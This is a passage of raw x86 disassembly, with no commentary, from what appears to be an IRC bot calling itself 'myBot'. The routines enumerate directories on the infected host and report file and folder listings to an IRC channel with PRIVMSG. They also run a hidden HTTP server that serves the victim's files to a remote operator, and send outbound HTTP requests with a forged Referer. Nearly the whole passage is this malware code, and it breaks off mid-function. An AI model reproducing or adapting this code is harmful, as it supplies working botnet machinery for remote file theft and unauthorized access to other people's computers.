lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_412E0D
add esp, 28h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403417: ; CODE XREF: sub_4030C4+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_403390
; ---------------------------------------------------------------------------
loc_403422: ; CODE XREF: sub_4030C4+308�j
cmp [ebp+arg_C], edi
jz loc_403520
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_40344E: ; CODE XREF: sub_4030C4+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40344E
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_1 ; "%s%s/"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_403491: ; CODE XREF: sub_4030C4+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403491
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_4034B5: ; CODE XREF: sub_4030C4+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034B5
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_4034D7
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4034DC
; ---------------------------------------------------------------------------
loc_4034D7: ; CODE XREF: sub_4030C4+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4034DC: ; CODE XREF: sub_4030C4+411�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_4034EF: ; CODE XREF: sub_4030C4+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034EF
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_4036BF
; ---------------------------------------------------------------------------
loc_403520: ; CODE XREF: sub_4030C4+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_40354D: ; CODE XREF: sub_4030C4+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_4036CE
; ---------------------------------------------------------------------------
loc_403566: ; CODE XREF: sub_4030C4+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_403590
push edi
push [ebp+var_36C]
call sub_402439
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403590: ; CODE XREF: sub_4030C4+4A8�j
cmp [ebp+arg_C], edi
jz loc_4036A4
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_4035BC: ; CODE XREF: sub_4030C4+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035BC
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_4035FF: ; CODE XREF: sub_4030C4+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035FF
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_403623: ; CODE XREF: sub_4030C4+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403623
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_403645
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40364A
; ---------------------------------------------------------------------------
loc_403645: ; CODE XREF: sub_4030C4+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40364A: ; CODE XREF: sub_4030C4+57F�j
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40365D: ; CODE XREF: sub_4030C4+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40365D
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_412E0D
add esp, 1Ch
jmp short loc_4036CE
; ---------------------------------------------------------------------------
loc_4036A4: ; CODE XREF: sub_4030C4+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_4036BF: ; CODE XREF: sub_4030C4+457�j
lea eax, [ebp+var_24C]
push eax
call sub_412E0D
add esp, 18h
loc_4036CE: ; CODE XREF: sub_4030C4+34E�j
; sub_4030C4+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4036D7: ; CODE XREF: sub_4030C4+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4036D7
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
cmp [ebp+arg_8], edi
jz short loc_403702
push 0FAh
call ds:dword_41F000 ; Sleep
loc_403702: ; CODE XREF: sub_4030C4+25C�j
; sub_4030C4+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_41F050 ; FindNextFileA
test eax, eax
jnz loc_403319
loc_40371A: ; CODE XREF: sub_4030C4+24A�j
push [ebp+var_C]
call ds:dword_41F044 ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_40375F
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_402439
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_412BB5
add esp, 14h
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_40375F: ; CODE XREF: sub_4030C4+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_403779
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40378D
; ---------------------------------------------------------------------------
loc_403779: ; CODE XREF: sub_4030C4+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_412BB5
add esp, 10h
loc_40378D: ; CODE XREF: sub_4030C4+699�j
; sub_4030C4+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403796: ; CODE XREF: sub_4030C4+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403796
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4030C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037B8 proc near ; CODE XREF: sub_4039DE+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call ds:dword_41F03C ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403875
push esi
push ebx
call ds:dword_41F060 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_40386E
push edi
jmp short loc_403806
; ---------------------------------------------------------------------------
loc_403803: ; CODE XREF: sub_4037B8+B3�j
mov edx, [ebp+var_8]
loc_403806: ; CODE XREF: sub_4037B8+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_40381D
mov [ebp+var_4], edx
loc_40381D: ; CODE XREF: sub_4037B8+60�j
push 2
push esi
neg edx
push edx
push ebx
call ds:dword_41F05C ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call ds:dword_41F058 ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_403868
call dword_433558
cmp eax, 2733h
jnz short loc_40386D
xor eax, eax
loc_403868: ; CODE XREF: sub_4037B8+9F�j
sub [ebp+var_8], eax
jnz short loc_403803
loc_40386D: ; CODE XREF: sub_4037B8+AC�j
pop edi
loc_40386E: ; CODE XREF: sub_4037B8+46�j
push ebx
call ds:dword_41F034 ; CloseHandle
loc_403875: ; CODE XREF: sub_4037B8+31�j
pop esi
pop ebx
leave
retn
sub_4037B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403879 proc near ; CODE XREF: sub_403B4C+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_403888: ; CODE XREF: sub_403879+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_403888
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_4038B3
loc_403896: ; CODE XREF: sub_403879+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_4038A0
mov byte ptr [esi+eax], 2Fh
loc_4038A0: ; CODE XREF: sub_403879+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_4038A6: ; CODE XREF: sub_403879+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4038A6
sub ecx, edx
cmp esi, ecx
jb short loc_403896
loc_4038B3: ; CODE XREF: sub_403879+1B�j
pop esi
pop ebx
pop ebp
retn
sub_403879 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038B7 proc near ; CODE XREF: sub_4078FA+4DC0�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_4334B0
push 6
push 1
push 2
call dword_4334A0
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_4335EC
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_406B1D
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_433458
cmp eax, 0FFFFFFFFh
jz short loc_403997
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_40392A
mov eax, (offset asc_41FA74+2)
loc_40392A: ; CODE XREF: sub_4038B7+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_412E0D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_403959: ; CODE XREF: sub_4038B7+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403959
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_433534
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_433414
pop esi
pop ebx
loc_403997: ; CODE XREF: sub_4038B7+65�j
push [ebp+var_4]
call dword_4335AC
call dword_4335B8
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_412BB5
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_4039DC
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
locret_4039DC: ; CODE XREF: sub_4038B7+109�j
leave
retn
sub_4038B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4039DE proc near ; DATA XREF: sub_403B4C+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_412DD0
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_412BB5
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_412BB5
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_403A46
push offset aTextHtml ; "text/html"
jmp short loc_403A4B
; ---------------------------------------------------------------------------
loc_403A46: ; CODE XREF: sub_4039DE+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_403A4B: ; CODE XREF: sub_4039DE+66�j
push eax
call sub_412BB5
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068 ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41F064 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_403AB8
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 24h
jmp short loc_403AD0
; ---------------------------------------------------------------------------
loc_403AB8: ; CODE XREF: sub_4039DE+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_412BB5
add esp, 28h
loc_403AD0: ; CODE XREF: sub_4039DE+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_403AD9: ; CODE XREF: sub_4039DE+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403AD9
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_433534
cmp [ebp+74h+var_A4], ebx
jnz short loc_403B12
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_4037B8
pop ecx
pop ecx
jmp short loc_403B2F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_4039DE+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_4030C4
add esp, 10h
loc_403B2F: ; CODE XREF: sub_4039DE+132�j
push [ebp+74h+var_44C]
call dword_4335AC
push [ebp+74h+var_B4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4039DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B4C proc near ; CODE XREF: sub_403E06+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_403B7A
push offset aS_6 ; "\\%s"
jmp short loc_403B82
; ---------------------------------------------------------------------------
loc_403B7A: ; CODE XREF: sub_403B4C+25�j
mov byte ptr [eax], 5Ch
push offset aS_1 ; "%s"
loc_403B82: ; CODE XREF: sub_403B4C+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_412BB5
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_403B9C: ; CODE XREF: sub_403B4C+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403B9C
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_403C22
push 2
pop ebx
loc_403BAD: ; CODE XREF: sub_403B4C+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_403BB6: ; CODE XREF: sub_403B4C+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403BB6
sub eax, edx
cmp ebx, eax
jnb short loc_403BEF
cmp [ebp+esi+var_10C], 25h
jnz short loc_403BEF
cmp [ebp+esi+var_10B], 32h
jnz short loc_403BEF
cmp [ebp+esi+var_10A], 30h
jnz short loc_403BEF
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_403C09
; ---------------------------------------------------------------------------
loc_403BEF: ; CODE XREF: sub_403B4C+75�j
; sub_403B4C+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_403BFF
push 5Ch
pop eax
jmp short loc_403C02
; ---------------------------------------------------------------------------
loc_403BFF: ; CODE XREF: sub_403B4C+AC�j
movsx eax, al
loc_403C02: ; CODE XREF: sub_403B4C+B1�j
mov [ebp+edi+var_210], al
loc_403C09: ; CODE XREF: sub_403B4C+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_403C15: ; CODE XREF: sub_403B4C+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403C15
sub eax, ecx
cmp esi, eax
jb short loc_403BAD
loc_403C22: ; CODE XREF: sub_403B4C+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_412BB5
lea eax, [ebp+var_314]
push offset asc_420328 ; "\n"
push eax
call sub_413859
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F06C ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_403C73
cmp eax, 0FFFFFFFFh
jnz short loc_403C76
push [ebp+arg_0]
jmp loc_403CFB
; ---------------------------------------------------------------------------
loc_403C73: ; CODE XREF: sub_403B4C+118�j
mov [ebp+var_4], ebx
loc_403C76: ; CODE XREF: sub_403B4C+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_403C83
mov [ebp+var_4], ebx
loc_403C83: ; CODE XREF: sub_403B4C+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_403D06
cmp [ebp+arg_C], edi
jz short loc_403CFA
lea edi, [ebp+var_314]
dec edi
loc_403CA5: ; CODE XREF: sub_403B4C+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403CA5
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_4205E4 ; "*"
push eax
movsw
call sub_412BB5
lea eax, [ebp+var_210]
push eax
call sub_403879
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_412BB5
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_403D55
; ---------------------------------------------------------------------------
loc_403CFA: ; CODE XREF: sub_403B4C+150�j
push eax
loc_403CFB: ; CODE XREF: sub_403B4C+122�j
call dword_4335AC
jmp loc_403DED
; ---------------------------------------------------------------------------
loc_403D06: ; CODE XREF: sub_403B4C+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403D55
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_412BB5
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_41F060 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_41F034 ; CloseHandle
loc_403D55: ; CODE XREF: sub_403B4C+1AC�j
; sub_403B4C+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_410EEA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43433C[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_4039DE
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_403DFC
push [ebp+arg_0]
call dword_4335AC
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_412BB5
lea eax, [ebp+var_8C4]
push eax
call sub_401C33
add esp, 10h
loc_403DED: ; CODE XREF: sub_403B4C+1B5�j
; sub_403B4C+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403DF4: ; CODE XREF: sub_403B4C+2B6�j
push 5
call ds:dword_41F000 ; Sleep
loc_403DFC: ; CODE XREF: sub_403B4C+26F�j
cmp [ebp+var_318], edi
jz short loc_403DF4
jmp short loc_403DED
sub_403B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_403E06 proc near ; DATA XREF: sub_401141+363�o
; sub_4078FA+3FA2�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_4335EC
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_4334A0
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_4041D9
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_434344[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_433578
cmp eax, edi
jz loc_4041D9
push 7FFFFFFFh
push ebx
call dword_4335C0
cmp eax, edi
jz loc_4041D9
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_433444
cmp eax, edi
jz loc_4041D9
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_4041BB
; ---------------------------------------------------------------------------
loc_403EEB: ; CODE XREF: sub_403E06+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_403EF0: ; CODE XREF: sub_403E06+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_4334F4
test eax, eax
jz loc_404198
cmp esi, ebx
jnz short loc_403F6D
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_433464
cmp eax, 0FFFFFFFFh
jz loc_404198
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_403F46
loc_403F38: ; CODE XREF: sub_403E06+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_403F46
inc ecx
cmp ecx, edx
jb short loc_403F38
loc_403F46: ; CODE XREF: sub_403E06+130�j
; sub_403E06+139�j
cmp ecx, edx
jnz short loc_403F5C
cmp edx, 40h
jnb short loc_403F5C
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_403F5C: ; CODE XREF: sub_403E06+142�j
; sub_403E06+147�j
cmp eax, [ebp+var_4]
jbe loc_404198
mov [ebp+var_4], eax
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403F6D: ; CODE XREF: sub_403E06+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_433414
test eax, eax
jg short loc_403FF1
push esi
call dword_4335AC
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_404198
loc_403FB5: ; CODE XREF: sub_403E06+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_403FDB
inc eax
cmp eax, [ebp+var_128]
jb short loc_403FB5
jmp loc_404198
; ---------------------------------------------------------------------------
loc_403FCC: ; CODE XREF: sub_403E06+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_403FDB: ; CODE XREF: sub_403E06+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_403FCC
dec [ebp+var_128]
jmp loc_404198
; ---------------------------------------------------------------------------
